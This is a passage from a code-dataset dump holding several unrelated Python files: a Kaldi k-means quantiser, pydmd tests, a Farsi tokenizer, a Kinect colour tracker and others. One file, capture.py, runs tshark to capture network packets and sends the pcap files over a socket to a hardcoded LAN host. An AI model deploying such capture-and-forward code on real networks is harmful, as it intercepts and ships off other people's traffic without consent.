###\n","sub_path":"migrations/versions/76dfc0fdc93e_movies_table.py","file_name":"76dfc0fdc93e_movies_table.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"504887209","text":"#!/usr/bin/env python3\nimport subprocess\nimport socket\nfrom multiprocessing import Process\n\n#CONFIGURATION VARS\n#root=subprocess.run(\"pwd\",shell=True,stdout=subprocess.PIPE).stdout.decode(\"utf-8\")[:-1]\n#tsharkroot=subprocess.run(\"which tshark\",shell=True,stdout=subprocess.PIPE).stdout.decode(\"utf-8\")[:-1]\n\n#CONFIGURATION VARS\ncmd = \"tshark -V -T fields -e frame.time_epoch -e ip.src -e ip.dst -e eth.src -e eth.dst -e frame.protocols -e http.host -F pcap -c 100 -w\" #tshark.pcap > tshark.out\"\ndef sendFile(filename):\n\tprint(\"asynch hit\")\n\tsoc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\tsoc.connect((\"192.168.1.204\",35380))\n\tfp = open(filename,\"rb\")\n\tbuf = fp.read()\n\tfp.close()\n\tprint(\"sending \" + str(len(buf)))\n\tsoc.send(str(len(buf)).encode('utf-8'))\n\t#soc.close()\n\t#soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\t#soc.connect((\"192.168.1.204\",35380))\n\tsoc.send(buf)\n\tsoc.close()\n\t#soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\t#soc.connect((\"127.0.0.1\",35380))\n\t#soc.send(\"&$%#@@#%$&\".encode('utf-8'))\n\t#soc.close()\n\ndef main():\n\tcount = 0\n\tglobal cmd\n\twhile count < 2:\n\t\tpacketCapFile = \"tshark\" + str(count) + \".pcap\"\n\t\tpacketOutFile = \"outTshark\" + str(count) + \".out\"\n\t\tsubprocess.run(cmd + packetCapFile + \">\" + packetOutFile,shell=True)\n\t\tcount = count +1\n\t\tp = Process(target=sendFile,args=(packetCapFile,))\n\t\tp.start()\n\nmain()\n","sub_path":"Client/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351216691","text":"#!/home/ga96yar/tensorflow_py3/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nCalculate k-means.\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport pandas as pd\nimport 
pickle\nimport copy\nimport numpy as np\nimport collections\nfrom kaldi_io import kaldi_io\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\nfrom scipy.cluster.vq import vq, whiten\nfrom KaldiHelper.MiscHelper import Misc\nfrom KaldiHelper.IteratorHelper import DataIterator\n\n\nclass KmeansVq(object):\n def __init__(self, cluster, multiple=False, whitening=False, MiniBatch=True, KaldiFormatting=False):\n self._kaldi_formatting = KaldiFormatting\n self._multiple = multiple\n self._whitening = whitening\n self._MiniBatch = MiniBatch\n self._num_cluster = cluster\n self._dict_codebook = None\n self.codebook = None\n # self._load_codebook_pd('codebook.pd')\n # self._build_dataset()\n\n def create_codebook(self, nj, data_folder):\n # create keys for enumeration\n if self._multiple:\n keys = ['energy', 'raw', 'delta', 'dd']\n else:\n keys = ['simple']\n\n # init 4 minibatchkmeans for energy, raw, delta and delta delta features\n dict_kmeans = {}\n for key in keys:\n dict_kmeans[key] = MiniBatchKMeans(n_clusters=self._num_cluster, init='random', batch_size=200,\n verbose=1, reassignment_ratio=0.001, max_no_improvement=100,\n n_init=self._num_cluster)\n\n # create dataiterator\n dataset = DataIterator(nj, data_folder)\n\n # iterator and do kmeans\n df = pd.DataFrame()\n while True:\n try:\n data_path = dataset.next_file()\n print(data_path)\n for key, mat in kaldi_io.read_mat_ark(data_path):\n tmp_df = pd.DataFrame(mat)\n df = df.append(tmp_df.sample(int(tmp_df.shape[0] * 1.0)))\n\n if df.shape[0] > 1000:\n # so kmeans for every features\n if self._multiple:\n dict_kmeans['energy'].partial_fit(whiten(df.values[:, [0, 13, 26]]))\n dict_kmeans['raw'].partial_fit(whiten(df.values[:, range(1, 13, 1)]))\n dict_kmeans['delta'].partial_fit(whiten(df.values[:, range(14, 26, 1)]))\n dict_kmeans['dd'].partial_fit(whiten(df.values[:, range(27, 39, 1)]))\n else:\n if self._whitening:\n dict_kmeans['simple'].partial_fit(whiten(df.values))\n else:\n dict_kmeans['simple'].partial_fit(df.values)\n self._dict_codebook = dict_kmeans\n df = pd.DataFrame() # clean up\n except StopIteration:\n break\n\n def load_pickle_codebook(self, infile):\n self._dict_codebook = pickle.loads(infile.read())\n\n def save_pickle_codebook(self, outfile):\n outfile.write(pickle.dumps(self._dict_codebook))\n\n def load_codebook(self, path):\n if not self._kaldi_formatting:\n raise TypeError\n for key, mat in kaldi_io.read_mat_ark(path):\n self.codebook = mat\n\n def save_codebook(self, path):\n if not self._kaldi_formatting:\n raise TypeError\n # prepare codebook for saving\n path_new = str.split(path, '.')\n assert len(self._dict_codebook) > 0\n\n if len(self._dict_codebook) > 1:\n # prepare codebook for multiple vqs\n self.codebook = np.zeros([self._num_cluster, 39]) # 39 is the feature dimension\n keys = ['energy', 'raw', 'delta', 'dd']\n dict_indicies = {'energy': [0, 13, 26], 'raw': range(1, 13, 1), 'delta': range(14, 26, 1),\n 'dd': range(27, 39, 1)}\n for key in keys:\n self.codebook[:, dict_indicies[key]] = self._dict_codebook[key].cluster_centers_\n path = path_new[0] + '_multiple.' + path_new[1]\n else:\n self.codebook = self._dict_codebook['simple'].cluster_centers_\n path = path_new[0] + '_single.' 
+ path_new[1]\n\n with open(path, 'wb') as f:\n # print(self.codebook)\n kaldi_io.write_mat(f, self.codebook, key='cb')\n\n def vq_data(self, nj, data_folder, output_folder):\n # vqing traing data\n assert self.codebook.shape[0] > 0\n print('VQing training data...')\n\n dataset = DataIterator(nj, data_folder)\n\n keys = []\n dict_vq, dict_indicies = {}, {}\n if self._multiple:\n keys = ['energy', 'raw', 'delta', 'dd']\n dict_indicies = {'energy': [0, 13, 26], 'raw': range(1, 13, 1), 'delta': range(14, 26, 1),\n 'dd': range(27, 39, 1)}\n else:\n keys = ['simple']\n dict_indicies = {'simple': range(0, 39)}\n\n for key in keys:\n dict_vq[key] = self.codebook[:, dict_indicies[key]]\n\n tmp_dict = {}\n labels_all = []\n phoneme_all = []\n count = 1\n while True:\n try:\n data_path = dataset.next_file()\n print(\"Data path is in \", data_path)\n for key, mat in kaldi_io.read_mat_ark(data_path):\n if self._multiple:\n # getting label for every vq\n df = pd.DataFrame(\n vq(whiten(mat[:, dict_indicies['energy']]), dict_vq['energy'])[0][:, np.newaxis])\n df = pd.concat([df, pd.DataFrame(vq(whiten(mat[:, dict_indicies['raw']]),\n dict_vq['raw'])[0][:, np.newaxis])], axis=1)\n df = pd.concat([df, pd.DataFrame(vq(whiten(mat[:, dict_indicies['delta']]),\n dict_vq['delta'])[0][:, np.newaxis])], axis=1)\n df = pd.concat([df, pd.DataFrame(vq(whiten(mat[:, dict_indicies['dd']]),\n dict_vq['dd'])[0][:, np.newaxis])], axis=1)\n else:\n if self._whitening:\n df = pd.DataFrame(vq(whiten(mat[:, :39]), dict_vq['simple'])[0][:, np.newaxis])\n labels_all.append(df.values)\n else:\n df = pd.DataFrame(vq(mat[:, :39], dict_vq['simple'])[0][:, np.newaxis])\n labels_all.append(df.values)\n\n if np.shape(mat)[1] > 39:\n phoneme_all.append(mat[:, 39])\n\n # add to tmp_dict for later saving\n tmp_dict[key] = df\n\n # ordered dict\n od = collections.OrderedDict(sorted(tmp_dict.items()))\n\n # save label-stream from vq\n with open(output_folder + '/feats_vq_' + str(count), 'wb') as f:\n for key, mat in list(od.items()):\n kaldi_io.write_mat(f, mat.values.astype(np.float32, copy=False), key=key)\n\n tmp_dict = {}\n count += 1\n\n except StopIteration:\n # calc MI\n if False:\n misc = Misc()\n labels_all = np.concatenate(labels_all)\n # labels_all = np.reshape(labels_all, [np.shape(labels_all)[0] * np.shape(labels_all)[1]],\n # np.shape(labels_all)[2])\n phoneme_all = np.concatenate(phoneme_all)\n # phoneme_all = np.reshape(phoneme_all, [np.shape(phoneme_all)[0] * np.shape(phoneme_all)[1]],\n # np.shape(phoneme_all)[2])\n print(misc.calculate_mi(labels_all, phoneme_all))\n break\n\n\nclass KmeansVqMmi(object):\n\n def __init__(self, cb_size):\n self._cbsize = cb_size\n self._weights = None\n self._dataset = None\n self._mi = None\n self._delta = None\n self._sorted_labels = None\n\n # init methods\n # self._load_weights(path_weights)\n # self._load_dataset(path_data)\n\n def _get_sort_label_stream(self, stream, cb_size):\n \"\"\"\n\n :param stream: input label stream\n :param cb_size: size of codebook\n :return: return occupancy of label stream\n \"\"\"\n\n # define counter array for labels\n count_array = np.zeros(cb_size)\n\n # count occupancy\n for element in stream:\n count_array[element] += 1.0\n\n # sort of accupancy and reverse result (from big to small)\n occupany = np.argsort(count_array)[::-1]\n\n # some debugging\n # print(count_array)\n # print(occupany)\n\n return occupany\n\n def _modify_weight(self, weights, index_tuple, delta):\n \"\"\"\n :param index_tuple: index tuple\n :param delta: delta parameter\n 
\"\"\"\n\n weights[index_tuple[0], index_tuple[1]] += delta\n\n return weights\n\n def _load_weights(self, path):\n for key, mat in kaldi_io.read_mat_ark(path):\n self._weights = mat\n\n def _load_dataset(self, path):\n for key, mat in kaldi_io.read_mat_ark(path):\n self._dataset = mat\n\n def create_dataset(self, nj, frac, path_data, output_folder):\n\n dataset = DataIterator(nj, path_data)\n\n data = []\n misc = Misc()\n count_size = 0\n while True:\n try:\n data_path = dataset.next_file()\n print(data_path)\n for key, mat in kaldi_io.read_mat_ark(data_path):\n df_mat = pd.DataFrame(mat)\n np_mat = df_mat.sample(frac=frac).values\n # np_mat[:, 39] = misc.trans_vec_to_phones(np_mat[:, 39])\n data.append(np_mat)\n\n except StopIteration:\n data_sample = np.concatenate(data)\n print(data_sample.shape)\n data_dict = {}\n data_dict['data'] = data_sample\n\n with open(output_folder + '/dataset.mat', 'wb') as f:\n for key, mat in list(data_dict.items()):\n kaldi_io.write_mat(f, mat.astype(np.float32, copy=False), key=key)\n\n break\n\n def do_mmi(self):\n\n misc = Misc()\n\n i = 0 # sorted index\n j = 0 # activation index\n iter = 0\n print('Iteration: ' + str(iter))\n\n while j < 39:\n print('Activation: ' + str(j))\n tmp_weight = copy.deepcopy(self._weights)\n new_weights = self._modify_weight(tmp_weight,\n (self._sorted_labels[i], j), self._delta)\n new_labels, _ = vq(whiten(self._dataset[:, :39]), new_weights)\n\n mi = misc.calculate_mi(np.expand_dims(new_labels, 1), self._dataset[:, 39])\n # print('Tmp MI: ' + str(mi))\n\n if mi - self._mi > 0:\n self._weights = new_weights\n self._mi = mi\n self._save_weights()\n print(self._mi)\n j += 1\n self._delta = np.abs(self._delta)\n else:\n if self._delta < 0:\n self._delta = np.abs(self._delta)\n j += 1\n\n else:\n self._delta = -self._delta\n\n if j == 39:\n j = 0\n i += 1\n print('Label number: ' + str(i))\n\n if i == 400:\n i = 0\n iter += 1\n # x.append(iter)\n # y.append(mi_old)\n # sc.set_offsets(np.c_[x, y])\n # fig.canvas.draw_idle()\n # plt.pause(0.1)\n print('Iteration: ' + str(iter))\n if iter > 20:\n break\n print('Creating new sorted labels...')\n self._sorted_labels = self._get_sort_label_stream(new_labels, self._cbsize)\n\n def init_training(self, path_data, path_weights, delta):\n self._load_weights(path_weights)\n self._load_dataset(path_data)\n self._delta = delta\n assert self._weights is not None or self._dataset is not None\n\n misc = Misc()\n\n label, _ = vq(whiten(self._dataset[:, :39]), self._weights)\n\n # calc mutual information\n self._mi = misc.calculate_mi(label, self._dataset[:, 39])\n\n print('Init MI: ' + str(self._mi))\n\n codebook_size = 400\n\n self._sorted_labels = self._get_sort_label_stream(label, self._cbsize)\n\n def _save_weights(self):\n weights_dict = {'weights': self._weights}\n with open('weights_tmp.mat', 'wb') as f:\n for key, mat in list(weights_dict.items()):\n kaldi_io.write_mat(f, mat.astype(np.float32, copy=False), key=key)\n\n\ndef main(arguments):\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"-n\", \"--numjobs\", nargs=2, type=int, help=\"number of jobs\", default=10)\n parser.add_argument(\"-k\", \"--kaldiformat\", help=\"use kaldi-formatted codebook-file\", action=\"store_true\")\n subparsers = parser.add_subparsers(help='sub-command train|vq', dest='command')\n\n parser_train = subparsers.add_parser('train', help='training kmeans')\n parser_train.add_argument(\"-m\", \"--multiple\", 
action=\"store_true\")\n parser_train.add_argument(\"num_classes\", type=int, help=\"number of classes or clusters\")\n parser_train.add_argument('inputdir', help=\"Input Files\", type=str)\n parser_train.add_argument('-o', '--outfile', help=\"Output file\",\n default=sys.stdout, type=argparse.FileType('wb'))\n\n parser_vq = subparsers.add_parser('vq', help='quanitzing a dataset')\n parser_vq.add_argument('codebook', help=\"codebook file\", type=argparse.FileType('rb'))\n parser_vq.add_argument('outdir', help=\"Output directory\", type=str)\n\n args = parser.parse_args(arguments)\n\n for arg in vars(args):\n print (\" Argument {:14}: {}\".format(arg, getattr(args, arg)))\n\n if args.command == 'train':\n print(' ---- training:')\n if not os.path.isdir(args.inputdir):\n raise AssertionError(\"inputdir {0} is not a directory\".format(args.inputdir))\n kmeans = KmeansVq(args.num_classes, multiple=args.multiple)\n kmeans.create_codebook(args.numjobs, args.inputdir)\n kmeans.save_pickle_codebook(args.outfile)\n else:\n print('vq not yet implemented')\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv[1:]))\n\n # tmp.load_codebook('codebook_single.mat')\n # tmp.vq_data(35, '../plain_feats_20k/train_20k', '../plain_feats/backup_20k_vq/vq_train')\n # tmp.vq_data(30, '../plain_feats_20k/test', '../plain_feats/backup_20k_vq/vq_test')\n # tmp.mutual_information(35)\n # tmp.multiple_vq_data(20, 'train_20kshort_nodup', '../plain_feats/backup_20k_vq/vq_train')\n\n # tmp.vq_data(20, 'train_20kshort_nodup', '../exp/test_400_0/vq_train')\n # tmp.vq_data(30, 'test', '../exp/test_400_0/vq_test')\n","sub_path":"KaldiHelper/KmeansVqHelper.py","file_name":"KmeansVqHelper.py","file_ext":"py","file_size_in_byte":15374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"2786936","text":"from builtins import range\nfrom unittest import TestCase\nimport numpy as np\nimport os\n\nfrom pydmd.dmdoperator import DMDOperator\nfrom pydmd.utils import compute_tlsq\n\nimport matplotlib.pyplot as plt\n\n# 15 snapshot with 400 data. 
The matrix is 400x15 and it contains\n# the following data: f1 + f2 where\n# f1 = lambda x,t: sech(x+3)*(1.*np.exp(1j*2.3*t))\n# f2 = lambda x,t: (sech(x)*np.tanh(x))*(2.*np.exp(1j*2.8*t))\nsample_data = np.load('tests/test_datasets/input_sample.npy')\n\nclass TestDmdOperator(TestCase):\n def test_constructor(self):\n operator = DMDOperator(svd_rank=2, exact=True, forward_backward=False,\n rescale_mode='auto', sorted_eigs=False)\n\n assert operator._svd_rank == 2\n assert operator._exact == True\n assert operator._forward_backward == False\n assert operator._rescale_mode == 'auto'\n\n def test_noncompute_error(self):\n operator = DMDOperator(svd_rank=2, exact=True, forward_backward=False,\n rescale_mode='auto', sorted_eigs=False)\n\n with self.assertRaises(ValueError):\n operator.shape\n\n with self.assertRaises(ValueError):\n operator.Lambda\n\n with self.assertRaises(ValueError):\n operator.modes\n\n with self.assertRaises(ValueError):\n operator.eigenvalues\n\n with self.assertRaises(ValueError):\n operator.eigenvectors\n\n with self.assertRaises(ValueError):\n operator.as_numpy_array\n\n def test_compute_operator(self):\n operator = DMDOperator(svd_rank=0, exact=True, forward_backward=False,\n rescale_mode='auto', sorted_eigs=False)\n operator.compute_operator(np.ones((3, 3)), np.ones((3, 3)))\n\n assert operator.as_numpy_array is not None\n assert operator.eigenvalues is not None\n assert operator.eigenvectors is not None\n assert operator.modes is not None\n assert operator.Lambda is not None\n\n # test that a value of 'auto' in rescale_mode is replaced by the singular\n # values of X\n def test_rescalemode_auto_singular_values(self):\n operator = DMDOperator(svd_rank=0, exact=True, forward_backward=False,\n rescale_mode='auto', sorted_eigs=False)\n operator.compute_operator(np.ones((3, 3)), np.ones((3, 3)))\n np.testing.assert_almost_equal(operator._rescale_mode, np.array([3.]),\n decimal=1)\n\n def test_call(self):\n operator = DMDOperator(svd_rank=2, exact=True, forward_backward=False,\n rescale_mode=None, sorted_eigs=False)\n\n X = sample_data[:, :-1]\n Y = sample_data[:, 1:]\n X, Y = compute_tlsq(X, Y, 0)\n\n operator.compute_operator(X,Y)\n\n expected = np.array([-0.47643628 + 0.87835227j, -0.47270971 + 0.88160808j])\n\n np.testing.assert_almost_equal(operator(np.ones(2)), expected, decimal=6)\n\n def test_compute_eigenquantities_wrong_rescalemode(self):\n operator = DMDOperator(svd_rank=0, exact=True, forward_backward=False,\n rescale_mode=4, sorted_eigs=False)\n with self.assertRaises(ValueError):\n operator.compute_operator(np.ones((3, 3)), np.ones((3, 3)))\n\n operator = DMDOperator(svd_rank=0, exact=True, forward_backward=False,\n rescale_mode=np.ones((4,)), sorted_eigs=False)\n with self.assertRaises(ValueError):\n operator.compute_operator(np.ones((3, 3)), np.ones((3, 3)))\n\n def test_plot_operator(self):\n operator = DMDOperator(svd_rank=2, exact=True, forward_backward=False,\n rescale_mode=None, sorted_eigs=False)\n\n X = sample_data[:, :-1]\n Y = sample_data[:, 1:]\n X, Y = compute_tlsq(X, Y, 0)\n\n operator.compute_operator(X, Y)\n operator.plot_operator()\n plt.close()\n","sub_path":"tests/test_dmdoperator.py","file_name":"test_dmdoperator.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347722717","text":"# This script parses out the read ids for each of the runs.\nimport os\nfrom tqdm import tqdm\n\ndrive_dir = \"/media/saad/Samsung_T5\"\n\nnums = {int(x[6:9]):x 
for x in os.listdir(os.path.join(drive_dir, 'consolidated/multiplexed'))}\nfor run_id, multiplexed in tqdm(nums.items()):\n    # Get read_ids for that sample\n    with open(os.path.join(drive_dir, 'consolidated/multiplexed', multiplexed), 'r') as f:\n        read_ids = [x.split(' ')[0][1:] for x in f.readlines() if 'runid' in x]\n    with open(os.path.join(drive_dir, f'consolidated/read_ids/{run_id}'), 'w') as f:\n        f.write(\"\\n\".join(read_ids))\n    ","sub_path":"scripts/sequencing/fast5_read_ids.py","file_name":"fast5_read_ids.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"157290464","text":"#!/usr/bin/python\n\nimport threading, random\n\ndef Splitter(words):\n    mylist = words.split()\n    newlist = []\n    while (mylist):\n        newlist.append(mylist.pop(random.randrange(0, len(mylist))))\n    print ('- '.join(newlist))\n\nif __name__ == '__main__':\n    sentence = 'The quick brown fox jumps over the lazy dog.'\n    numOfThreads = 25\n    threadList = []\n\n    print (\"STARTING...\\n\")\n    for i in range(numOfThreads):\n        t = threading.Thread(target=Splitter,args=(sentence,))\n        t.start()\n        threadList.append(t)\n\n    print (\"\\n Thread Count: \"+ str(threading.activeCount()))\n    print (\"EXITING...\\n\")\n    \n\n","sub_path":"threading2.py","file_name":"threading2.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"539095896","text":"import unicodedata\r\nimport texttable as tt\r\n\r\nsignAndPunctuation=[\" \",\",\",\"'\",'\"',\";\",\":\",\".\",\"+\",\"-\",\"*\",\"/\",\"(\",\")\",\"[\",\"]\",\"{\",\"}\",\"&\",\"%\",\"$\",\"#\",\"@\",\"!\",\"?\",\"~\",\"<\",\">\",\"؟\",\"!\",\":\",\"؛\",\"،\",\"٬\",\"٫\",\"٪\",\"«\",\"»\",\"\"]\r\n\r\n\r\n#Defining the tokensClass, which has two attributes: value and type\r\nclass tokensClass:\r\n\tvalue=\"\"\r\n\ttype=\"\"\r\n\r\n#Defining a function which reads input.txt and returns it as a string\r\ndef readFromFile():\r\n\twith open('input.txt', 'r', encoding='UTF-8') as inputText:\r\n\t\tdata=inputText.read().replace('\\n', '')\r\n\treturn data\r\n\t\t\r\n#Defining a function which writes a string to the output.txt file\r\ndef writeToFile(tableContent):\r\n\t\twith open ('output.txt', 'w', encoding='UTF-8') as outputText:\r\n\t\t\toutputText.write(tableContent+\"\\n\")\r\n\r\n\r\n#Defining the main tokenizer function\t\r\ndef tokenizer(myString):\r\n\t#WhiteSpacing the string\r\n\tmyStringSplitted=mySplitter(myString)\r\n\t#Define an empty list which would store objects\r\n\tmyStringClassed = []\r\n\r\n\t#for every string in myStringSplitted, put the value and type into tokensClass\r\n\tfor eachToken in myStringSplitted:\r\n\t#define it as a tokensClass member\r\n\t\ttempStringClassed=tokensClass()\r\n\t\t#take the myStringSplitted and put it in tempStringClassed as value\r\n\t\ttempStringClassed.value=eachToken\r\n\t\t#take the categorized myStringSplitted and put it in tempStringClassed as type \r\n\t\ttempStringClassed.type=categorizer(eachToken[0])\r\n\t\t#append the tempStringClassed into myStringClassed list\r\n\t\tmyStringClassed.append(tempStringClassed)\r\n\r\n\r\n\t#print and also write the output to a file after formatting it in a table\t\r\n\twriteToFile(tableDrawer(myStringClassed))\r\n\tprint(\"\\n\\n- Process Completed!\")\r\n\tprint(\"\\n\\n- Please open Output.txt to see the results of the Tokenizing!\\n\\n\")\r\n\t\r\n#Defining the function which splits the myString into tokens and returns 
them\r\ndef mySplitter(myString):\r\n\t#defining a temp string to put non-sign characters in before appending them to the finalList\r\n\tstringToAppend=\"\"\r\n\t#defining a temp list to put each detected token in\r\n\tfinalList=[]\r\n\t\r\n\t#iterating through all characters in the myString\r\n\tfor eachCharacter in myString:\r\n\t\t#if the character is a sign\r\n\t\tif (eachCharacter in signAndPunctuation):\r\n\t\t\t#if the temp string (stringToAppend) is not empty (if there haven't been any characters before the sign character to append to the finalList)\r\n\t\t\tif (stringToAppend != \"\"):\r\n\t\t\t\t#append the string before the sign character (stringToAppend) to the finalList\r\n\t\t\t\tfinalList.append(stringToAppend)\r\n\t\t\t\t#reset the stringToAppend to empty\r\n\t\t\t\tstringToAppend=\"\"\r\n\t\t\t\r\n\t\t\t#if the character is not a space character\r\n\t\t\tif ((eachCharacter != \" \") and (eachCharacter != \"\")):\r\n\t\t\t\t#append the character as a single token to the finalList\r\n\t\t\t\tfinalList.append(eachCharacter)\r\n\t\t\r\n\t\t#if the character is not a sign\r\n\t\telse:\r\n\t\t\t#append it to the temp string (stringToAppend)\r\n\t\t\tstringToAppend+=eachCharacter\r\n\t\r\n\t#return the finalList as the tokenized list of the myString\r\n\treturn finalList\t\r\n\r\n\t\r\n#defining a function to categorize the first character of the string under the 5 main categories\r\ndef categorizer(myCharacter):\r\n\t#Determining if the character is a Farsi or Arabic Number by its utf-8 code\r\n\tif((ord(myCharacter)<=ord(\"۹\") and ord(myCharacter)>=ord(\"۰\")) or (ord(myCharacter)<=ord(\"٩\") and ord(myCharacter)>=ord(\"٠\"))):\r\n\t\tmyCharacterType=\"Farsi-Numeric\"\r\n\t#Determining if the character is an English Number by its utf-8 code\r\n\telif(ord(myCharacter)<=ord(\"9\") and ord(myCharacter)>=ord(\"0\")):\r\n\t\tmyCharacterType=\"English-Numeric\"\r\n\t#Determining if the character is a Farsi or Arabic Alphabet by its utf-8 code\r\n\telif((ord(myCharacter)<=ord(\"ٟ\") and ord(myCharacter)>=ord(\"ؠ\")) or (ord(myCharacter)<=ord(\"ە\") and ord(myCharacter)>=ord(\"ٱ\")) ):\r\n\t\tmyCharacterType=\"Farsi-Alphabetic\"\r\n\t#Determining if the character is an English Alphabet by its utf-8 code\r\n\telif((ord(myCharacter)<=ord(\"Z\") and ord(myCharacter)>=ord(\"A\")) or (ord(myCharacter)<=ord(\"z\") and ord(myCharacter)>=ord(\"a\")) ):\r\n\t\tmyCharacterType=\"English-Alphabetic\"\r\n\t#Determining if the character is a Sign by its utf-8 code\r\n\telif(myCharacter in signAndPunctuation):\r\n\t\tmyCharacterType=\"Signs\"\r\n\t#If the character is none of the above, it's undetermined\r\n\telse:\r\n\t\tmyCharacterType=\"Not-Determined\"\r\n\t\r\n\t#return the character type\t\r\n\treturn myCharacterType\r\n\t\r\n#Use texttable to put the final data in a beautiful table\r\ndef tableDrawer(myStringClassed):\t\r\n\ttab = tt.Texttable()\r\n\t#defining headers (column headers)\r\n\theadings = ['Token','Type']\r\n\ttab.header(headings)\r\n\t#defining each row's data lists\r\n\ttokens=[]\r\n\ttypes=[]\r\n\t#adding each token's value and type to each row\r\n\tfor eachEntry in myStringClassed:\r\n\t\ttokens.append(eachEntry.value)\r\n\t\ttypes.append(eachEntry.type)\r\n\t#adding each row to the table\t\r\n\tfor row in zip(tokens,types):\r\n\t\ttab.add_row(row)\r\n\t#drawing the table\r\n\tfinalTable = tab.draw()\r\n\t\r\n\t#returning the table as the result of the function\r\n\treturn finalTable\r\n\t\t\r\n#defining the main function\t\t\r\ndef main():\t\r\n\tprint(\"\\n\\n\\n\\t\\t\\t*** 
Python Tokenizer ***\\n\\n\")\r\n\tprint(\"\\t\\tBy: Farid Akhavan - MaHaN Masboughi\\n\")\r\n\tprint(\"\\t\\tDate: April 20th, 2018\\n\")\r\n\tprint(\"\\t\\tGithub Link: https://github.com/faridcboy/PythonTokenizer\\n\\n\\n\")\r\n\tprint(\"\\n\\n- Tokenizing Input.txt started!\")\r\n\ttokenizer(readFromFile())\r\n\t\r\nif __name__ == \"__main__\":\r\n    main()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115093655","text":"import freenect\nimport cv2\nimport numpy as np\n#import frame_convert\n\nwhile(1):\n\n    frame,_ = freenect.sync_get_video()\n    #image,_= cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n    hsv = cv2.cvtColor(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB), cv2.COLOR_RGB2HSV)\n    \n    # define range of yellow color in HSV\n    # change it according to your need !\n    lower_yellow = np.array([85,100,100], dtype=np.uint8)\n    upper_yellow = np.array([95,255,255], dtype=np.uint8)\n\n    # Threshold the HSV image to get only yellow colors\n    mask = cv2.inRange(hsv, lower_yellow, upper_yellow)\n    \n    \n    cv2.imshow('frame',cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n    cv2.imshow('mask',mask)\n    k = cv2.waitKey(5) & 0xFF\n    if k == 27:\n        break\n\ncv2.destroyAllWindows()\n","sub_path":"opencvTests/colorTracking.py","file_name":"colorTracking.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247648507","text":"import time\nimport sys\nimport os\n\ndef get_data(input_file):\n    file = open(input_file, \"r\")\n    n=int(file.readline())\n    tasks=file.readlines()\n    for i in range(0,n):\n        #tasks[i] = tasks[i].split()\n        tasks[i] = [int(j) for j in tasks[i].split()]\n        tasks[i] = [i+1] + tasks[i]\n    file.close()\n    return tasks, n\n\ndef sort(tasks): \n    tasks.sort(key = lambda x: x[3] - x[2] + x[1]) \n    return tasks \n\ndef fastest_machine(machines):\n    min = machines[0]\n    idx = [0]\n    for i in range(1,4):\n        if machines[i] < min:\n            min = machines[i]\n            idx = [i]\n        if machines[i] == min:\n            idx.append(i)\n    return idx\n\ndef assign(choice, tasks_om, counters, machines, task, latency):\n    tasks_om[choice].append(task[0])\n    counters[choice] += 1\n    if machines[choice] < task[2]:\n        machines[choice] = task[1] + task[2]\n    else:\n        machines[choice] += task[1]\n    if machines[choice] > task[3]:\n        latency += machines[choice] - task[3]\n    return tasks_om, counters, machines, latency\n\ndef solution(tasks):\n    machines = [0,0,0,0]\n    counters = [0,0,0,0]\n    tasks_om = [[],[],[],[]]\n    latency = 0\n    for task in tasks:\n        machine_choice = fastest_machine(machines)\n        if len(machine_choice) > 1:\n            mini = 9999999999\n            choice = machine_choice[0]\n            for m in machine_choice:\n                if machines[m] != 0 and counters[m] != 0:\n                    if counters[m]/machines[m] < mini:\n                        mini = counters[m]/machines[m]\n                        choice = m\n                else:\n                    choice = m\n                    mini = 0\n            #print(choice)\n            tasks_om, counters, machines, latency = assign(choice, tasks_om, counters, machines, task, latency)\n        else:\n            tasks_om, counters, machines, latency = assign(machine_choice[0], tasks_om, counters, machines, task, latency)\n    return tasks_om, latency\n\ndef save_results(tasks, latency, n):\n    outputF = \"results/132302/a1/\" + sys.argv[1] + \"/\" + str(n) + \".txt\"\n    file = open(outputF,\"w\")\n    file.write(str(latency) + '\\n')\n    for task in tasks:\n        temp = \"\"\n        for id in task:\n            temp += str(id) + ' '\n            #file.write(str(id)+ ' ' )\n        file.write(temp[:len(temp)-1]+'\\n')\n\n\ndef 
